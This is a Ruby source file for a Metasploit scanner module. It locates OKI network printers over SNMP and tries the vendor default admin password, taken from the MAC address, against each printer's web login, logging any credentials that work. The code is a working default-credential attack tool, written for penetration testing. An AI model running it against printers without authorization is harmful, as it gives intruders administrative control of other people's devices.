GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/misc/oki_scanner.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# TODO: Split this module into two separate SNMP and HTTP modules.
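class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SNMPClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # IEEE OUI prefixes (first three MAC octets, upper-case hex) treated as OKI.
  # OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt
  # The previous condition compared against 002536 twice; these are the two
  # distinct prefixes it actually matched.
  OKI_OUIS = %w[002536 008087].freeze

  # IF-MIB ifPhysAddress column: one entry per interface holding the raw MAC.
  IF_PHYS_ADDRESS_OID = '1.3.6.1.2.1.2.2.1.6'
  # sysName.0, used only for the "Found:" message.
  SYS_NAME_OID = '1.3.6.1.2.1.1.5.0'

  # Pages on the printer's embedded web server. INDEX_PAGE is sent as the
  # Referer; AUTH_REQ_PAGE is the page requested with the candidate credential
  # (its name suggests it sits behind the admin login).
  INDEX_PAGE = 'index_ad.htm'
  AUTH_REQ_PAGE = 'status_toc_ad.htm'

  # Start of an HTTP status line; group 1 is the three-digit status code.
  STATUS_LINE = %r{\AHTTP/\d\.\d (\d{3})}

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OKI Printer Default Login Credential Scanner',
        'Description' => %q{
          This module scans for OKI printers via SNMP, then tries to connect to found devices
          with vendor default administrator credentials via HTTP authentication. By default, OKI
          network printers use the last six digits of the MAC as admin password.
        },
        'Author' => 'antr6X <anthr6x[at]gmail.com>',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('SNMPPORT', [true, 'The SNMP Port', 161]),
        OptPort.new('HTTPPORT', [true, 'The HTTP Port', 80])
      ]
    )

    deregister_options('RPORT', 'VHOST')
  end

  # Restore the RPORT value that run_host swapped for SNMPPORT. Guarded so a
  # run that never reached run_host does not write nil into the datastore.
  def cleanup
    datastore['RPORT'] = @org_rport if defined?(@org_rport)
  end

  # Record a working credential and its login in the database.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  # @return whatever create_credential_login returns
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      last_attempted_at: Time.now,
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Scanner entry point, called once per target.
  #
  # Walks ifPhysAddress over SNMP and, for every interface whose OUI is an OKI
  # prefix, tries the vendor default (admin / last six hex digits of the MAC)
  # against the web interface on HTTPPORT.
  #
  # @param ip [String] target address
  def run_host(ip)
    # connect_snmp presumably takes its port from RPORT (that is why RPORT is
    # swapped here and restored in cleanup) — confirm against SNMPClient.
    @org_rport = datastore['RPORT']
    datastore['RPORT'] = datastore['SNMPPORT']

    snmp = connect_snmp

    snmp.walk(IF_PHYS_ADDRESS_OID) do |mac|
      # Only the first six octets are considered, as before. Loopback and
      # virtual interfaces commonly report an empty ifPhysAddress; the old
      # [-6, 6] slice turned that into nil.upcase, which raised and aborted
      # the rest of the host, so anything shorter than a full MAC is skipped.
      hex = mac.value.to_s.unpack('H12').first.upcase
      next if hex.length < 12
      next unless OKI_OUIS.include?(hex[0, 6])

      last_six = hex[-6, 6]
      sys_name = snmp.get_value(SYS_NAME_OID).to_s
      print_status("Found: #{sys_name}")
      print_status("Trying credential: admin/#{last_six}")
      try_default_login(ip, last_six)
    end
  rescue ::Rex::ConnectionError, ::SNMP::RequestTimeout, ::SNMP::UnsupportedVersion
    # No need to make noise about timeouts
  rescue ::Interrupt
    raise
  rescue ::Exception => e
    # Kept broad, as the original was, so one host's failure is reported
    # rather than ending the scan; Interrupt is re-raised above.
    print_error("#{ip} Error: #{e.class} #{e} #{e.backtrace}")
  ensure
    disconnect_snmp
  end

  private

  # Send one Basic-auth request for AUTH_REQ_PAGE with the candidate password
  # and act on the HTTP status code.
  #
  # The TCP socket opened here is always closed in ensure. The previous code
  # called a bare `disconnect()` instead, which none of the visible mixins
  # provide, and never closed this Rex socket.
  #
  # @param ip [String] target address, used in the Host and Referer headers
  # @param password [String] candidate admin password
  def try_default_login(ip, password)
    http_port = datastore['HTTPPORT']
    tcp = Rex::Socket::Tcp.create(
      'PeerHost' => rhost,
      'PeerPort' => http_port,
      'Context' => { 'Msf' => framework, 'MsfExploit' => self }
    )

    auth = Rex::Text.encode_base64("admin:#{password}")
    # HTTP/1.1 requires a Host header; the previous request omitted it, which
    # strict servers answer with 400 regardless of the credential.
    request = "GET /#{AUTH_REQ_PAGE} HTTP/1.1\r\n" \
              "Host: #{ip}:#{http_port}\r\n" \
              "Referer: http://#{ip}/#{INDEX_PAGE}\r\n" \
              "Authorization: Basic #{auth}\r\n\r\n"
    tcp.put(request)

    # 12 bytes covers exactly "HTTP/1.x NNN"; a short or non-HTTP reply yields
    # nil here and lands in the else branch instead of raising.
    status = http_status(tcp.recv(12))

    case status
    when '200'
      print_good("#{rhost}:#{http_port} logged in as: admin/#{password}")
      report_cred(
        ip: rhost,
        port: http_port,
        service_name: 'http',
        user: 'admin',
        password: password,
        proof: status.inspect
      )
    when '401'
      print_error('Default credentials failed')
    when '404'
      print_status("Page not found, try credential manually: admin/#{password}")
    else
      print_status('Unexpected message')
    end
  ensure
    tcp.close if tcp
  end

  # Status code from the start of an HTTP reply, or nil when the reply is
  # missing, truncated or not an HTTP status line.
  #
  # @param data [String, nil] raw bytes read from the socket
  # @return [String, nil] three-digit status code
  def http_status(data)
    data.to_s[STATUS_LINE, 1]
  end
end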